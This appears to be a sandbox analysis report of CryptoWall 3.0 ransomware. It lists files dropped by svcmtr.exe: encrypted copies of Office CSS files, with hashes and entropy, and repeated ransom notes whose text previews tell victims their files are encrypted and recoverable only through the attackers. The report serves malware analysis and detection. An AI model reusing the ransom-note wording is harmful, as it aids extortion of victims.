                                                                                                                          SHA-256:E198E295EC5C0A688A59522F8B82CDFF21DBE8637AC985610300B8D2AAE08D34
                                                                                                                          SHA-512:8210805D93CA0AD93D9086CF78042C6EF4DA6E70CDC66F86BAFF7F0D2F0445ECA87C97470AC0FED0A98D8FD84279A402D7DE8A67C2DD4DFFB5B9C5F482F6E790
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..Qb......P....a.m....3..y.p.l.[.I.0..w1`.....P..W..H..MU ..U.a!......)....3...^PC....5K...........0G.d..a.mw....+.....3....F"..C*yU.z...........J9/Bz/+#t3..3.E{..y6+.m=..i..S.f.g..\C!n<..'.....cP........C.....aB...K.$_D".K"m.s!#.....)..<u..?..m./.9n..73....>/3.......gn......D..-.W-.\?....3..LV...H.....Y..f.{x.<C.X..W..L..a.Olm.G.RE\..\*.-.P&..)......P....nU.......1rI......0.j.!.7.r..z...d.. ....H..b............32.G.IX.s......VZ....Jr..e....$al.'.V.o....S..w..m.P#g\...[...|O..K....z..j.t.5.X....r...E.})r.|.j....+.."..,....,.....sA..s\.=#..p-.V.m.X;..f'..%e-=.y..o....MyX/...i.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME53.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):125006
                                                                                                                          Entropy (8bit):7.998415768971659
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:tmYMmQbQI5wmy8KFlu0e89HKXWSz5VPya+tOrg8f3oXloX:tmYnQB7y8KYWSnPp+tOdeW
                                                                                                                          MD5:D7641AD1ECC678646229941F810E660A
                                                                                                                          SHA1:EAAE2D6143CEA402DB325459DCECB077F8EBCDC4
                                                                                                                          SHA-256:E198E295EC5C0A688A59522F8B82CDFF21DBE8637AC985610300B8D2AAE08D34
                                                                                                                          SHA-512:8210805D93CA0AD93D9086CF78042C6EF4DA6E70CDC66F86BAFF7F0D2F0445ECA87C97470AC0FED0A98D8FD84279A402D7DE8A67C2DD4DFFB5B9C5F482F6E790
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..Qb......P....a.m....3..y.p.l.[.I.0..w1`.....P..W..H..MU ..U.a!......)....3...^PC....5K...........0G.d..a.mw....+.....3....F"..C*yU.z...........J9/Bz/+#t3..3.E{..y6+.m=..i..S.f.g..\C!n<..'.....cP........C.....aB...K.$_D".K"m.s!#.....)..<u..?..m./.9n..73....>/3.......gn......D..-.W-.\?....3..LV...H.....Y..f.{x.<C.X..W..L..a.Olm.G.RE\..\*.-.P&..)......P....nU.......1rI......0.j.!.7.r..z...d.. ....H..b............32.G.IX.s......VZ....Jr..e....$al.'.V.o....S..w..m.P#g\...[...|O..K....z..j.t.5.X....r...E.})r.|.j....+.."..,....,.....sA..s\.=#..p-.V.m.X;..f'..%e-=.y..o....MyX/...i.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME54.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):127502
                                                                                                                          Entropy (8bit):7.998399261999212
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:zmdu9nuzWzy2vSHKLT6ECZs5QCxh5rymVFglsrr4GP:zmd8sWmrqLT6ECZsqCxTXVOGP
                                                                                                                          MD5:556735A534B2CDF0D4850E42A04FFBE5
                                                                                                                          SHA1:4E26BF2571E625DF1B6C0D0946C608C29CF2C205
                                                                                                                          SHA-256:9FC2AB5DB2330267C120C0F5842F7DBFC5B4E4DAAE9338183B7258FCC47120DE
                                                                                                                          SHA-512:DF3365FBCB2F1BC4DC2782EF78C033772A9804F5DFA9488D9EE402A4269EA2AF8C2672FED2B48A26C69AB1CF672731A57C6262B65D2CFE20659A72DC8E4E907B
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.......&z2..J..ed...L.>...fx.;......\.gvCl(.(l..o....^.t..Y.?......U......~{.F....!..........Eh......wIt.....3..S.,}.h5\.{..d.^.T....r........\,..x.......7.Ycs.mf...Hr59...#..Jt.*..".2...f:....;.?.m.1B...2.I*..$..U.{.[...O..9{..8.s..#DX......a..];.d.......-.3.R.....~..)ai..i.._.%.. ..w.^.7..`".0MZ..r.y.V......v.m....t..xJWH....&.$.F...Y.z^..?...b(fd.......U.."c..hg.`. ...v.....+.B..|...B...l.x..^..o.../R......MN6..Mn.S.....1...q.W...I..?F..b....F.u./.@..A._...[..H...Z....._.{..|..i..........tu..?.yn.....2.j1....l^.....p...;..e.......%j.(..rcF..J.>7$.K."....1$PP..*q(...G+]|7

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME54.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):127502
                                                                                                                          Entropy (8bit):7.998399261999212
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:zmdu9nuzWzy2vSHKLT6ECZs5QCxh5rymVFglsrr4GP:zmd8sWmrqLT6ECZsqCxTXVOGP
                                                                                                                          MD5:556735A534B2CDF0D4850E42A04FFBE5
                                                                                                                          SHA1:4E26BF2571E625DF1B6C0D0946C608C29CF2C205
                                                                                                                          SHA-256:9FC2AB5DB2330267C120C0F5842F7DBFC5B4E4DAAE9338183B7258FCC47120DE
                                                                                                                          SHA-512:DF3365FBCB2F1BC4DC2782EF78C033772A9804F5DFA9488D9EE402A4269EA2AF8C2672FED2B48A26C69AB1CF672731A57C6262B65D2CFE20659A72DC8E4E907B
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.......&z2..J..ed...L.>...fx.;......\.gvCl(.(l..o....^.t..Y.?......U......~{.F....!..........Eh......wIt.....3..S.,}.h5\.{..d.^.T....r........\,..x.......7.Ycs.mf...Hr59...#..Jt.*..".2...f:....;.?.m.1B...2.I*..$..U.{.[...O..9{..8.s..#DX......a..];.d.......-.3.R.....~..)ai..i.._.%.. ..w.^.7..`".0MZ..r.y.V......v.m....t..xJWH....&.$.F...Y.z^..?...b(fd.......U.."c..hg.`. ...v.....+.B..|...B...l.x..^..o.../R......MN6..Mn.S.....1...q.W...I..?F..b....F.u./.@..A._...[..H...Z....._.{..|..i..........tu..?.yn.....2.j1....l^.....p...;..e.......%j.(..rcF..J.>7$.K."....1$PP..*q(...G+]|7

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME55.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):123582
                                                                                                                          Entropy (8bit):7.9984901334997165
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:0GoggOtWC9SIXxBt+ADaUryrJszrywPqun:0GDRsQHBVDau7zdPq+
                                                                                                                          MD5:2DB1D114601C8446E00FBFCDAC1C1518
                                                                                                                          SHA1:4DB846F1860D11640F353E94CBD50CC5405A3F92
                                                                                                                          SHA-256:C261A1574F2CE7F8BDA2B13918087B99B58FE7EC4147172675F2DEBF70361899
                                                                                                                          SHA-512:1D3A01375F8A5F2F82FBF5DCCCA0727DBCF910C5D9D3FF35CEF986CA0D8B53C6EAAB19EF5FEE9CF7325EF9CF141F3BB3851A8355E70DF88A9F945A46D0760B6D
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..F.[D..3..#Q.......^zR3.....gP.....4..k.:..W.Q....`/&.......D..5.L4.......=.8.L(...t..'....F.....u3.<....}.@.v....U....d$....&.W..........0SpO...#.>..4..D.F...L...=..TM.kOQIr..a...P.X,.....'.a.V{./..#.....+...%%.q.2........v.....*G.....W..'.K.'......=7....V.idR.....+P........M.....d.6.WU..$/..H..+...h......x.`..Wo}..g..N....Od.....@.A.0._n....Y,6.R1................3.l.......7.}..6_.M..1u..'].{hv...v....|.....;....{....P.{.N....G..5....).l."v%..u......^.q.Q.;F...U.Dp=.....@F".b?.?N...'...S^k.x..N.T..J...8\="...w......5....{.y_......,.O.f}u.....+.LL).I....e....n...)..@V#.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME55.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):123582
                                                                                                                          Entropy (8bit):7.9984901334997165
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:0GoggOtWC9SIXxBt+ADaUryrJszrywPqun:0GDRsQHBVDau7zdPq+
                                                                                                                          MD5:2DB1D114601C8446E00FBFCDAC1C1518
                                                                                                                          SHA1:4DB846F1860D11640F353E94CBD50CC5405A3F92
                                                                                                                          SHA-256:C261A1574F2CE7F8BDA2B13918087B99B58FE7EC4147172675F2DEBF70361899
                                                                                                                          SHA-512:1D3A01375F8A5F2F82FBF5DCCCA0727DBCF910C5D9D3FF35CEF986CA0D8B53C6EAAB19EF5FEE9CF7325EF9CF141F3BB3851A8355E70DF88A9F945A46D0760B6D
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..F.[D..3..#Q.......^zR3.....gP.....4..k.:..W.Q....`/&.......D..5.L4.......=.8.L(...t..'....F.....u3.<....}.@.v....U....d$....&.W..........0SpO...#.>..4..D.F...L...=..TM.kOQIr..a...P.X,.....'.a.V{./..#.....+...%%.q.2........v.....*G.....W..'.K.'......=7....V.idR.....+P........M.....d.6.WU..$/..H..+...h......x.`..Wo}..g..N....Od.....@.A.0._n....Y,6.R1................3.l.......7.}..6_.M..1u..'].{hv...v....|.....;....{....P.{.N....G..5....).l."v%..u......^.q.Q.;F...U.Dp=.....@F".b?.?N...'...S^k.x..N.T..J...8\="...w......5....{.y_......,.O.f}u.....+.LL).I....e....n...)..@V#.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\QuickStyles\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\QuickStyles\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1036\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
